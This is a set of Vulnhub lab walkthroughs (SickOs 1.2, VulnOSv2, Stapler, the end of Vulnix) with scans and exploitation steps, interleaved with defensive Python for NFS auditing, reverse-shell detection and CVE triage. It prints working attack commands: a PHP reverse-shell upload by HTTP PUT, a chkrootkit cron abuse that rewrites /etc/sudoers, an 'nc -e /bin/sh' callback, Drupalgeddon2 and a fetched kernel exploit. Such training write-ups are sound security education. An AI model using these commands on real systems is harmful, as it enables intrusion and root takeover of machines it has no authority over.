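if __name__ == "__main__":
    for path, host, reason in audit_exports(SAMPLE_EXPORTS):
        print("%-14s %-18s %s" % (path, host, reason))
```

On the sample file /srv/public produces no finding, /srv/build produces all three, and /home/vulnix is reported for the wildcard host and for being writable without all_squash even though root_squash is set. Restricting the client list and adding all_squash (with anonuid/anongid) would have closed the uid-matching path; keeping /etc/exports out of a user's sudo rules would have closed the second.
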
So we got root access on Vulnix too. Next day, next machine!

SickOs: 1.2 Vulnhub Machine Walkthrough

Today we are playing with SickOs 1.2 from Vulnhub.

Get the IP first.

nmap -sP 192.168.18.0/24

The IP address is 192.168.18.90.

Let's do a detailed scan now.

root@kali:~# nmap 192.168.18.90 -A -O -sV -T5 -p- --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 04:22 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.90
Host is up (0.0010s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /test/: Test page
|_http-server-header: lighttpd/1.4.28
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:lighttpd:lighttpd:1.4.28: 
|       CVE-2013-4559   7.6     https://vulners.com/cve/CVE-2013-4559
|       CVE-2014-2323   7.5     https://vulners.com/cve/CVE-2014-2323
|       CVE-2013-4508   5.8     https://vulners.com/cve/CVE-2013-4508
|       CVE-2018-19052  5.0     https://vulners.com/cve/CVE-2018-19052
|       CVE-2014-2324   5.0     https://vulners.com/cve/CVE-2014-2324
|       CVE-2011-4362   5.0     https://vulners.com/cve/CVE-2011-4362
|_      CVE-2013-4560   2.6     https://vulners.com/cve/CVE-2013-4560
MAC Address: 08:00:27:65:6A:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.18, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.04 ms 192.168.18.90

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.84 seconds

There is nothing interesting in index.php,

but there is a page at /test.

Let's use curl and check the allowed HTTP methods.

curl -v -X OPTIONS http://192.168.18.90/test

Here PUT is allowed. Let's try uploading a PHP shell there.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Let's download this and PUT it on the server.

wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
tar -xzf php-reverse-shell-1.0.tar.gz

Edit the IP and PORT in the script.

Start a netcat listener on our machine:

nc -nlvp 5555

and upload it to the server:

curl --upload-file shell.php -v --url http://192.168.18.90/test/shell.php -0 --http1.0

Now try to access this on the server.

WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110) 

Looks like a problem with the firewall. Let's try port 443. Edit the file and re-upload it to the target.

We got a connection from the server. Great.

Let's now try to escalate privileges.

First get a TTY shell with the following command:

python -c 'import pty;pty.spawn("/bin/bash")'

Let's have a look at the cron jobs.

ls -l /etc/cron.daily

There is a cron job running chkrootkit. We have a vulnerability for chkrootkit here:

https://www.exploit-db.com/exploits/33899

chkrootkit will run any executable placed at /tmp/update with root privileges.

Let's create the file.

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update

Here our cron job runs daily, so we need to wait until the next time the job runs. Use this command to check whether the file has been updated:

ls -la /etc/sudoers

After a few minutes the /etc/sudoers file got updated.

Now check our privileges.

We are root now. Let's find the flag.

SickOS 1.2 conquered! Next day, next machine!

VulnOSv2 Vulnhub Machine Walkthrough

Today, we are working on the VulnOSv2 machine from Vulnhub.

First let's find the IP.

nmap 192.168.18.0/24

So, 192.168.18.88 is our machine’s IP.

Let's do a detailed scan now.

root@kali:~# nmap -p- -A -T5 -sV -O --script vuln 192.168.18.88
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 12:44 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.88
Host is up (0.00073s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.18.88
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/5
|     Form id: commerce-cart-add-to-cart-form-2
|     Form action: /jabc/?q=node/5
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/6
|     Form id: commerce-cart-add-to-cart-form-3
|     Form action: /jabc/?q=node/6
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/4
|     Form id: commerce-cart-add-to-cart-form-1
|_    Form action: /jabc/?q=node/4
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=N%3bO%3dA%27%20OR%20sqlspider
|_    http://192.168.18.88:80/jabc/misc/?C=D%3bO%3dD%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.7: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2014-0226   6.8     https://vulners.com/cve/CVE-2014-0226
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-2161   5.0     https://vulners.com/cve/CVE-2016-2161
|       CVE-2016-0736   5.0     https://vulners.com/cve/CVE-2016-0736
|       CVE-2014-3523   5.0     https://vulners.com/cve/CVE-2014-3523
|       CVE-2014-0231   5.0     https://vulners.com/cve/CVE-2014-0231
|       CVE-2020-11985  4.3     https://vulners.com/cve/CVE-2020-11985
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2015-3185   4.3     https://vulners.com/cve/CVE-2015-3185
|       CVE-2014-8109   4.3     https://vulners.com/cve/CVE-2014-8109
|       CVE-2014-0118   4.3     https://vulners.com/cve/CVE-2014-0118
|       CVE-2014-0117   4.3     https://vulners.com/cve/CVE-2014-0117
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
6667/tcp open  irc     ngircd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
MAC Address: 08:00:27:6B:9D:FC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.73 ms 192.168.18.88

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 366.39 seconds

Let's visit the website running on the machine.

Looks like the site is running on Drupal. Let's scan it with Droopescan.

droopescan scan drupal -u http://192.168.18.88/jabc

Seems like the Drupal version is 7.22 – 7.26.

Let's look for vulnerabilities now.

Have a look here: https://github.com/dreadlocked/Drupalgeddon2

Looks like it works on Drupal 7.x. Let's try that.

ruby drupalgeddon2.rb http://192.168.18.88/jabc

We got a shell! Let's check the user.

Time for privilege escalation. First, let's get a proper shell through netcat.

Start a listener on Kali.

root@kali:~# nc -nlvp 7777

and connect back from the victim machine.

nc -e /bin/sh 192.168.18.87 7777

Done.
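The netcat callback above is exactly the shape a host-based detection should catch. The following is an added example, not part of the original walkthrough: it takes a constructed `ps -eo pid,ppid,user,args` style snapshot (the process names and pids are made up to model the step shown above) and flags two signals, a netcat binary invoked with an exec flag pointing at a shell, and a shell whose parent process is netcat. The binary and flag names in `NETCAT_BINS`, `SHELLS` and `EXEC_FLAGS` are assumptions covering the common netcat variants.

```python
import os
import shlex

# Constructed `ps -eo pid,ppid,user,args` style snapshot (not taken from the page);
# pids 1403-1405 model the "nc -e /bin/sh <ip> <port>" step shown above.
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
    1     0 root     /sbin/init
  812     1 www-data php-fpm: pool www
 1403   812 www-data sh -c nc -e /bin/sh 192.168.18.87 7777
 1404  1403 www-data nc -e /bin/sh 192.168.18.87 7777
 1405  1404 www-data /bin/sh
 1510     1 root     /usr/bin/nc -l -p 8080
 1611   812 www-data /usr/bin/python3 /srv/app/worker.py
"""

# Assumed names for the usual netcat builds, shells and "run a program" flags.
NETCAT_BINS = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}


def parse_ps(text):
    """Turn the snapshot into process dicts; the first line is the header."""
    procs = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) == 4:
            pid, ppid, user, args = parts
            procs.append({"pid": int(pid), "ppid": int(ppid), "user": user, "args": args})
    return procs


def argv_of(args):
    try:
        return shlex.split(args)
    except ValueError:  # unbalanced quotes in a command line
        return args.split()


def first_bin(args):
    argv = argv_of(args)
    return os.path.basename(argv[0]) if argv else ""


def netcat_execs_shell(args):
    """True when a netcat token is followed by an exec flag whose target is a shell.

    The netcat token is searched anywhere in argv so that wrappers such as
    "sh -c nc -e /bin/sh ..." are caught as well.
    """
    argv = argv_of(args)
    for i, tok in enumerate(argv):
        if os.path.basename(tok) not in NETCAT_BINS:
            continue
        rest = argv[i + 1:]
        for j, opt in enumerate(rest):
            if opt in EXEC_FLAGS and j + 1 < len(rest) and os.path.basename(rest[j + 1]) in SHELLS:
                return True
            flag, _, value = opt.partition("=")  # handles --exec=/bin/sh style
            if value and flag in EXEC_FLAGS and os.path.basename(value) in SHELLS:
                return True
        return False
    return False


def detect_reverse_shells(procs):
    """Return (pid, reason) pairs for processes matching either signal."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for p in procs:
        if netcat_execs_shell(p["args"]):
            findings.append((p["pid"], "netcat invoked with an exec flag and a shell"))
            continue
        parent = by_pid.get(p["ppid"])
        if parent and first_bin(p["args"]) in SHELLS and first_bin(parent["args"]) in NETCAT_BINS:
            findings.append((p["pid"], f"shell whose parent is netcat (pid {parent['pid']})"))
    return findings


if __name__ == "__main__":
    for pid, reason in detect_reverse_shells(parse_ps(SAMPLE_PS)):
        print(f"pid {pid}: {reason}")
```

The plain listener on pid 1510 is not flagged, because the signal is not "netcat is running" but "netcat is handing a socket to a shell". The parent-child rule catches the shell even after the netcat command line has been rewritten or the process has re-executed, which is why it is worth keeping alongside the argument check.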

Time for Privilege Escalation

Let's check the OS information.

uname -a

Now search for Ubuntu 3.13 exploits using searchsploit.

searchsploit ubuntu 3.13

Let's try the first one, the Linux Kernel 3.13.0 < 3.19 exploit.

wget the file to the victim machine.

wget https://www.exploit-db.com/download/37292

Now rename the file to 37292.c and compile.

mv 37292 37292.c
gcc -o exploit 37292.c

Make sure that the exploit binary is there, and enter ./exploit to run it.

and… we are root!

Let's find the flag.

cd /root
cat flag.txt

Let's do another machine the next day!

Stapler: 1 Vulnhub Machine Walkthrough

Let's find the IP first with nmap.

nmap 192.168.18.0/24

The IP is 192.168.18.85.

Let's run an extended scan to enumerate the services and versions, with a basic vulnerability scan in nmap.

root@kali:~# nmap -sV -O -A -T5 --script vuln 192.168.18.85
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 04:00 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).

Nmap scan report for 192.168.18.85
Host is up (0.00064s latency).
Not shown: 992 filtered ports
PORT     STATE  SERVICE     VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp         vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp   open   domain      dnsmasq 2.75
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:thekelleys:dnsmasq:2.75: 
|       CVE-2019-14513  5.0     https://vulners.com/cve/CVE-2019-14513
|_      CVE-2019-14834  4.3     https://vulners.com/cve/CVE-2019-14834
80/tcp   open   http        PHP cli server 5.5 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves 
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp  open   doom?
3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1
MAC Address: 08:00:27:EC:EF:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms 192.168.18.85

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 565.32 seconds
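Both `--script vuln` scans on this page end with a `vulners` block that lists every CVE matched against the service banner (Apache httpd 2.4.7 in the first machine, dnsmasq 2.75 here). Read by eye that is a wall of identifiers; the useful defender's view is "which service, how many matches, and which ones score high enough to fix first". The following is an added example, not part of the original walkthrough: a small parser for that output format, run over a constructed excerpt whose CPE and CVE lines are copied from the two scans above (the two port header lines are constructed to match, and the lists are shortened). The CVSS threshold in `prioritize` is an assumption.

```python
import re
from collections import defaultdict

# Constructed excerpt in the format of the `nmap --script vuln` output above.
# CPE and CVE lines are copied from the two scans on this page; the port header
# lines are constructed to match them, and the CVE lists are shortened.
SAMPLE_SCAN = """\
80/tcp   open   http        Apache httpd 2.4.7
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.7: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2014-0231   5.0     https://vulners.com/cve/CVE-2014-0231
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
53/tcp   open   domain      dnsmasq 2.75
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:thekelleys:dnsmasq:2.75: 
|       CVE-2019-14513  5.0     https://vulners.com/cve/CVE-2019-14513
|_      CVE-2019-14834  4.3     https://vulners.com/cve/CVE-2019-14834
6667/tcp open   irc         ngircd
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+\S+\s+\S+")          # "80/tcp   open   http ..."
CPE_RE = re.compile(r"^\|\s+(cpe:/\S+?):?\s*$")                 # "|   cpe:/a:...:2.4.7: "
CVE_RE = re.compile(r"^\|[_ ]\s+(CVE-\d{4}-\d+)\s+(\d+(?:\.\d+)?)\s+(\S+)")


def parse_vulners(scan_text):
    """Return one dict per CVE line, tagged with the port and CPE it was reported under."""
    findings = []
    port = cpe = None
    for line in scan_text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, cpe = f"{m.group(1)}/{m.group(2)}", None  # new port: reset the CPE context
            continue
        m = CPE_RE.match(line)
        if m:
            cpe = m.group(1)
            continue
        m = CVE_RE.match(line)
        if m and cpe:
            findings.append({"port": port, "cpe": cpe, "cve": m.group(1),
                             "cvss": float(m.group(2)), "url": m.group(3)})
    return findings


def prioritize(findings, min_cvss=7.0):
    """Findings at or above the CVSS threshold (assumed 7.0), highest score first."""
    return sorted((f for f in findings if f["cvss"] >= min_cvss),
                  key=lambda f: f["cvss"], reverse=True)


def summarize_by_service(findings):
    """Per CPE: the port, how many CVEs were matched and the worst score among them."""
    summary = defaultdict(lambda: {"count": 0, "max_cvss": 0.0, "port": None})
    for f in findings:
        entry = summary[f["cpe"]]
        entry["count"] += 1
        entry["max_cvss"] = max(entry["max_cvss"], f["cvss"])
        entry["port"] = f["port"]
    return dict(summary)


if __name__ == "__main__":
    found = parse_vulners(SAMPLE_SCAN)
    for cpe, s in summarize_by_service(found).items():
        print(f"{s['port']:<9} {cpe:<40} {s['count']} CVEs, worst CVSS {s['max_cvss']}")
    print("Fix first:", [f["cve"] for f in prioritize(found)])
```

One caveat when acting on this list: `vulners` matches on the version string in the banner, so a distribution package that backports a fix while keeping the old version number will still be listed. Treat the output as a patch worklist to confirm against the package's own changelog, not as a finding in itself.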

Didn't find anything interesting on the port 80 web page, or in the nikto and gobuster scans.

Samba is running on port 139. Let's try to exploit it before going to FTP.

msfconsole
msf5 > use exploit/linux/samba/is_known_pipename

Now set the options.

Time to run the exploit. Enter run.

We got root. Now let's read the flag.

cat /root/flag.txt

Finished! That's all for today.